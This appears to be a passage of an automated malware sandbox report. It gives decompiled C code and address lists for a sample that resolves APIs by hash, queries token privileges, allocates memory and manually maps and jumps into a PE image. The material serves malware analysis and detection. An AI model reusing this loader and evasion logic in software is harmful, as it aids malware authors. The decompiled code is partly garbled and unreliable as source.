					if(E6ED0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6ED035F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6ECFF584(_t429 + 0x3c, _t262);
						_t265 = E6ED0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6ECFF654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6ECFF4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6ECFF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6ED035F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6ECFF4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6ED0306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6ED035F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6ED00FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6ED0306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6ED00FD4(_t403, _t413, _t403);
								}
								E6ECFF654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6ECFBB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6ECFBB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6ed0073f
0x6ed00741
0x6ed00748
0x6ed00fc7
0x6ed00fcd
0x6ed00fcd
0x6ed00752
0x6ed0075e
0x6ed0076a
0x6ed0076f
0x6ed0077c
0x6ed0078d
0x6ed0078f
0x6ed00790
0x6ed00791
0x6ed00791
0x6ed00792
0x6ed00796
0x6ed0079a
0x6ed0079f
0x6ed007a2
0x6ed007a8
0x6ed007c2
0x6ed007c9
0x6ed007cc
0x6ed007cf
0x6ed007d1
0x6ed007dd
0x6ed007ea
0x6ed007f7
0x6ed007fb
0x6ed00887
0x6ed00887
0x6ed00889
0x6ed0088d
0x6ed00898
0x6ed008ae
0x6ed008b1
0x6ed008b1
0x6ed008b5
0x6ed008be
0x6ed008c3
0x6ed008c3
0x6ed008c5
0x6ed008d6
0x6ed008f8
0x6ed008fa
0x6ed008fb
0x6ed008ff
0x6ed008ff
0x6ed00908
0x6ed00914
0x6ed0091d
0x6ed00933
0x6ed00943
0x6ed00948
0x6ed0094c
0x6ed00951
0x6ed00953
0x6ed009a3
0x6ed009b8
0x6ed009bc
0x6ed009c1
0x6ed009d2
0x6ed009e7
0x6ed009eb
0x6ed009f0
0x6ed009f2
0x6ed00a39
0x6ed00a3c
0x6ed00a8a
0x6ed00a8d
0x6ed00ace
0x6ed00ad2
0x6ed00ad7
0x6ed00adc
0x6ed00afb
0x6ed00afb
0x6ed00afb
0x6ed00afd
0x00000000
0x6ed00afd
0x6ed00ade
0x6ed00ae2
0x6ed00ae4
0x6ed00aeb
0x6ed00aeb
0x6ed00af1
0x6ed00af1
0x6ed00af3
0x6ed00af6
0x6ed00af6
0x00000000
0x6ed00af3
0x6ed00ae6
0x6ed00ae9
0x6ed00aef
0x6ed00aef
0x00000000
0x6ed00aef
0x00000000
0x6ed00ae9
0x6ed00a8f
0x6ed00a92
0x00000000
0x00000000
0x6ed00a98
0x6ed00a9d
0x6ed00aa2
0x6ed00ac1
0x6ed00ac1
0x6ed00acb
0x00000000
0x6ed00acb
0x6ed00aa4
0x6ed00aa8
0x6ed00aaa
0x6ed00ab1
0x6ed00ab1
0x6ed00ab7
0x6ed00ab7
0x6ed00ab9
0x6ed00abc
0x6ed00abc
0x00000000
0x6ed00ab9
0x6ed00aac
0x6ed00aaf
0x6ed00ab5
0x6ed00ab5
0x00000000
0x6ed00ab5
0x00000000
0x6ed00aaf
0x6ed00a3e
0x6ed00a40
0x6ed00a7f
0x6ed00a82
0x6ed00df4
0x6ed00df9
0x6ed00dfe
0x6ed00e1d
0x6ed00e1d
0x6ed00e27
0x00000000
0x6ed00e27
0x6ed00e00
0x6ed00e04
0x6ed00e06
0x6ed00e0d
0x6ed00e0d
0x6ed00e13
0x6ed00e13
0x6ed00e15
0x6ed00e18
0x6ed00e18
0x00000000
0x6ed00e15
0x6ed00e08
0x6ed00e0b
0x6ed00e11
0x6ed00e11
0x00000000
0x6ed00e11
0x00000000
0x6ed00e0b
0x00000000
0x6ed00a88
0x6ed00a46
0x6ed00a4b
0x6ed00a50
0x6ed00a6f
0x6ed00a6f
0x6ed00a79
0x00000000
0x6ed00a79
0x6ed00a52
0x6ed00a56
0x6ed00a58
0x6ed00a5f
0x6ed00a5f
0x6ed00a65
0x6ed00a65
0x6ed00a67
0x6ed00a6a
0x6ed00a6a
0x00000000
0x6ed00a67
0x6ed00a5a
0x6ed00a5d
0x6ed00a63
0x6ed00a63
0x00000000
0x6ed00a63
0x00000000
0x6ed00a5d
0x6ed009f4
0x6ed009f6
0x00000000
0x00000000
0x6ed00a00
0x6ed00a05
0x6ed00a0a
0x6ed00a29
0x6ed00a29
0x6ed00a33
0x00000000
0x6ed00a33
0x6ed00a0c
0x6ed00a10
0x6ed00a12
0x6ed00a19
0x6ed00a19
0x6ed00a1f
0x6ed00a1f
0x6ed00a21
0x6ed00a24
0x6ed00a24
0x00000000
0x6ed00a21
0x6ed00a14
0x6ed00a17
0x6ed00a1d
0x6ed00a1d
0x00000000
0x6ed00a1d
0x00000000
0x6ed00a17
0x6ed00959
0x6ed0095e
0x6ed00963
0x6ed00982
0x6ed00982
0x6ed0098c
0x00000000
0x6ed0098c
0x6ed00965
0x6ed00969
0x6ed0096b
0x6ed00972
0x6ed00972
0x6ed00978
0x6ed00978
0x6ed0097a
0x6ed0097d
0x6ed0097d
0x00000000
0x6ed0097a
0x6ed0096d
0x6ed00970
0x6ed00976
0x6ed00976
0x00000000
0x6ed00976
0x00000000
0x6ed0089a
0x6ed0089c
0x6ed00b01
0x6ed00b06
0x6ed00b09
0x6ed00b0e
0x6ed00b10
0x6ed00b25
0x6ed00b28
0x6ed00bf6
0x6ed00bfe
0x6ed00c01
0x6ed00c16
0x6ed00c20
0x6ed00c20
0x6ed00c22
0x6ed00c24
0x6ed00c33
0x6ed00c3f
0x6ed00c43
0x6ed00c46
0x6ed00c49
0x6ed00c4c
0x00000000
0x6ed00c4c
0x6ed00b38
0x6ed00b4a
0x6ed00b4e
0x6ed00bda
0x6ed00bda
0x6ed00be0
0x6ed00beb
0x6ed00be2
0x6ed00be2
0x6ed00be2
0x00000000
0x6ed00be0
0x6ed00b5b
0x6ed00b5c
0x6ed00b5e
0x6ed00b64
0x6ed00fb3
0x6ed00fb8
0x6ed00fba
0x00000000
0x00000000
0x6ed00fc0
0x6ed00b7b
0x6ed00b7f
0x6ed00b84
0x6ed00b96
0x6ed00b9a
0x6ed00ba5
0x6ed00ba6
0x6ed00ba7
0x6ed00ba8
0x6ed00baa
0x6ed00bb5
0x6ed00e2d
0x6ed00e2d
0x6ed00bb5
0x6ed00bbb
0x6ed00bc4
0x6ed00e3f
0x6ed00e55
0x6ed00e57
0x6ed00e59
0x6ed00f94
0x6ed00f9b
0x00000000
0x6ed00f9b
0x6ed00e68
0x6ed00e76
0x6ed00e90
0x6ed00e92
0x6ed00e94
0x6ed00fa5
0x6ed00faa
0x6ed00fac
0x00000000
0x00000000
0x6ed00fae
0x6ed00ea8
0x6ed00eb3
0x6ed00ec2
0x6ed00ed4
0x6ed00ed6
0x6ed00ed8
0x6ed00ee5
0x6ed00ee5
0x6ed00ef5
0x6ed00f06
0x6ed00f0b
0x6ed00f0d
0x6ed00f0f
0x6ed00f16
0x6ed00f17
0x6ed00f17
0x6ed00f23
0x6ed00f44
0x6ed00f4d
0x6ed00f59
0x6ed00f65
0x6ed00f6a
0x6ed00f6f
0x6ed00f75
0x6ed00f75
0x6ed00f7a
0x6ed00f80
0x00000000
0x6ed00f86
0x6ed00f88
0x00000000
0x6ed00f88
0x6ed00bca
0x6ed00bca
0x6ed00bcf
0x6ed00bd5
0x6ed00bd5
0x00000000
0x6ed00bcf
0x6ed00bc4
0x6ed00898
0x6ed00808
0x6ed00809
0x6ed0080b
0x6ed00811
0x6ed00dde
0x6ed00de3
0x6ed00de5
0x00000000
0x00000000
0x6ed00deb
0x6ed00828
0x6ed0082c
0x6ed00831
0x6ed00847
0x6ed0085e
0x6ed00862
0x6ed00c5a
0x6ed00c5a
0x6ed00862
0x6ed00868
0x6ed00871
0x6ed00c69
0x6ed00c7a
0x6ed00c7f
0x6ed00c81
0x6ed00c83
0x6ed00db4
0x6ed00db8
0x00000000
0x6ed00db8
0x6ed00c8f
0x6ed00cb4
0x6ed00cb6
0x6ed00cb8
0x6ed00dd0
0x6ed00dd5
0x6ed00dd7
0x00000000
0x00000000
0x6ed00dd9
0x6ed00cc9
0x6ed00cd7
0x6ed00cde
0x6ed00cdf
0x6ed00ce0
0x6ed00cf2
0x6ed00cf4
0x6ed00cf6
0x00000000
0x00000000
0x6ed00cfe
0x6ed00d19
0x6ed00d1b
0x6ed00d1d
0x6ed00dc2
0x6ed00dc7
0x6ed00dc9
0x00000000
0x00000000
0x6ed00dcb
0x6ed00d23
0x6ed00d2a
0x6ed00d2e
0x6ed00d99
0x6ed00d99
0x6ed00d9b
0x6ed00da2
0x6ed00da2
0x6ed00da8
0x6ed00da8
0x6ed00daa
0x6ed00daf
0x6ed00daf
0x00000000
0x6ed00daa
0x6ed00d9d
0x6ed00da0
0x6ed00da6
0x6ed00da6
0x00000000
0x6ed00da6
0x00000000
0x6ed00da0
0x6ed00d30
0x6ed00d30
0x6ed00d32
0x6ed00d3e
0x6ed00d43
0x6ed00d45
0x00000000
0x00000000
0x6ed00d47
0x6ed00d4b
0x6ed00d52
0x6ed00d53
0x6ed00d54
0x6ed00d56
0x00000000
0x00000000
0x6ed00d58
0x6ed00d5a
0x6ed00d61
0x6ed00d61
0x6ed00d67
0x6ed00d67
0x6ed00d69
0x6ed00d6e
0x6ed00d6e
0x6ed00d77
0x6ed00d7c
0x6ed00d81
0x6ed00d87
0x6ed00d87
0x6ed00d8c
0x00000000
0x6ed00d8c
0x6ed00d5c
0x6ed00d5f
0x6ed00d65
0x6ed00d65
0x00000000
0x6ed00d65
0x00000000
0x6ed00d93
0x6ed00d93
0x6ed00d94
0x6ed00d94
0x00000000
0x6ed00d32
0x6ed00877
0x6ed0087c
0x6ed00882
0x6ed00882
0x00000000
0x6ed00c59
0x6ed00c59
0x6ed00c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6ED0085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6ED00C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6ED00CB4

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 0310b73b46eb5fd9962ed05f2ae0e0535a14457c3caca53820ac2b203493a8ec
Instruction ID: 602912a79294241ae67967b8f0ed4306cc87e8bb5b2eb8bdd2d38fbcf97ac2b9
Opcode Fuzzy Hash: 0310b73b46eb5fd9962ed05f2ae0e0535a14457c3caca53820ac2b203493a8ec
Instruction Fuzzy Hash: 3A22D470608341FEE7A0DFA4C850BDF77A9AF81388F188D1DA8945B195FB71D905C762

Uniqueness

Uniqueness Score: -1.00%

Function 6ED02234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ED02234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6ED03AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6ED0306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6ed02234
0x6ed02238
0x6ed02254
0x6ed02257
0x6ed0223a
0x6ed02249
0x6ed0224c
0x6ed0224c
0x6ed02267
0x6ed0226c
0x6ed02270
0x6ed02278
0x6ed02278
0x6ed0227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6ECF4B17,00000000,00000000,?), ref: 6ED02278

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 4013c7e101b3b25f3726f3ff2eb8ace1269f46265168a0d65eb8bbc0cc548adb
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: D9E065B010F312ADF7449FA99D05F6F36D8AF84614F24892CB4A8D7184E670D4018371

Uniqueness

Uniqueness Score: -1.00%

Function 6ED02820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED02820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6ED0306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6ed02827
0x6ed02830
0x6ed0283e
0x6ed02861
0x6ed02861
0x6ed02840
0x6ed02857
0x6ed0285b
0x00000000
0x6ed0285d
0x6ed0285d
0x6ed0285d
0x6ed0285b
0x6ed02866

APIs

NtAllocateVirtualMemory.NTDLL(6ED088E6,?,00000000,000000FF,6ED088E6,6ED088E6,60A28C5C,60A28C5C,?,?,6ED088E6,00003000,00000004,000000FF), ref: 6ED02857

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: d0b04d6b7e2d676352f8ac46c1238fa2d5654b4b4fa6b505b31375c60e44972c
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: FEE0397120A342EFFB08CF99CC28E6BB7E9EF84608F148C2DB498CA250D730D8109721

Uniqueness

Uniqueness Score: -1.00%

Function 6ED03138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6ED03138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6ED034B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6ed03138
0x6ed0313d
0x6ed0313f
0x6ed03141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6ED034B0,6ED03128,60A28C5C,60A28C5C,?,6ECF6C99,00000000), ref: 6ED0313F

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 3f108af29b8a7326165db740316feb745d173f6ad6183317c41fe748b9c069d0
Instruction ID: b29638df2f09458955403c8d0cbd2243ac17bdd576cb44c93ec1df2249fad0f4
Opcode Fuzzy Hash: 3f108af29b8a7326165db740316feb745d173f6ad6183317c41fe748b9c069d0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00D92092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00D92092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0xd94418 = 1;
				asm("movaps xmm0, [0xd93010]");
				asm("movups [0xd94428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00D91770();
				E00D917BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E00D91770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0xd94418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E00D91770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00d9209e
0x00d920ac
0x00d920b3
0x00d920b6
0x00d920c0
0x00d920c7
0x00d920d1
0x00d920d7
0x00d920e0
0x00d920e9
0x00d920ec
0x00d920f0
0x00d920f8
0x00d920ff
0x00d92102
0x00d92105
0x00d92108
0x00d9210b
0x00d92125
0x00d9212b
0x00d9212e
0x00d92136
0x00d9213a
0x00d9213d
0x00d92140
0x00d92143
0x00d92146
0x00d92162
0x00d9217f
0x00d921a4
0x00d921a6
0x00d921af
0x00d921b2
0x00d921bc
0x00d921bf
0x00d921c2
0x00d921c5
0x00d921c8
0x00d92216
0x00d92216
0x00d92249
0x00d9224c
0x00d9225c
0x00d9225f
0x00d922a8
0x00d922a8
0x00d922b7
0x00d922bf
0x00d922cd
0x00d922dc
0x00d9230d
0x00d92316
0x00d9231a
0x00d9231e
0x00d92325
0x00d9232b
0x00d9232d
0x00d92336
0x00d92347
0x00d9234d
0x00d92350
0x00d92353
0x00000000
0x00000000
0x00d92359
0x00d922a8
0x00d92264
0x00d92272
0x00d9227a
0x00d9227d
0x00d9227f
0x00d92285
0x00d92291
0x00d92297
0x00d9229a
0x00d9229d
0x00d921f9
0x00d921f9
0x00d9236e
0x00d92374
0x00d92379
0x00d9237f
0x00d92385
0x00d9238b
0x00d92391
0x00d92394
0x00d92397
0x00d9239f
0x00d923a7
0x00d923ad
0x00d923b3
0x00d923b9
0x00d923bf
0x00d923cd
0x00d921da
0x00d921e0
0x00d921e0
0x00d92234

APIs

VirtualProtect.KERNELBASE ref: 00D9210B
VirtualProtect.KERNELBASE ref: 00D921A4
VirtualProtect.KERNELBASE ref: 00D9232B

Strings

`, xrefs: 00D9239F

Memory Dump Source

Source File: 00000001.00000002.692433477.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: ca389879f53eea3027f6e9e6e32b26097a7363e5d404f624c4546f6e60eb18f1
Instruction ID: 7742ea4273917560e880f5f43071c278fa5b9b0501370ba7be2f7d4a4cc8e48b
Opcode Fuzzy Hash: ca389879f53eea3027f6e9e6e32b26097a7363e5d404f624c4546f6e60eb18f1
Instruction Fuzzy Hash: 66B1ADB5E043199FCB14CF99C880AADBBF1BF88304F15856AE958AB351D730A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED010A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6ED010A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6ED0306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6ECFC280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6ECFBB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6ED0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6ECFF584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6ECFF4BC(_t59, 0);
					_t34 = E6ED0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6ed010b3
0x6ed010b5
0x6ed010c4
0x6ed010c8
0x6ed010d2
0x6ed010d2
0x6ed010d8
0x6ed010db
0x6ed010dd
0x6ed010e8
0x6ed01122
0x6ed01127
0x6ed0112c
0x6ed0112c
0x00000000
0x6ed01131
0x6ed010f4
0x6ed01107
0x6ed01118
0x6ed01118
0x6ed0111a
0x6ed01120
0x6ed0113e
0x6ed01145
0x6ed0114e
0x6ed0115c
0x6ed01165
0x6ed01168
0x6ed0116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6ED01118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6ED0117B

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
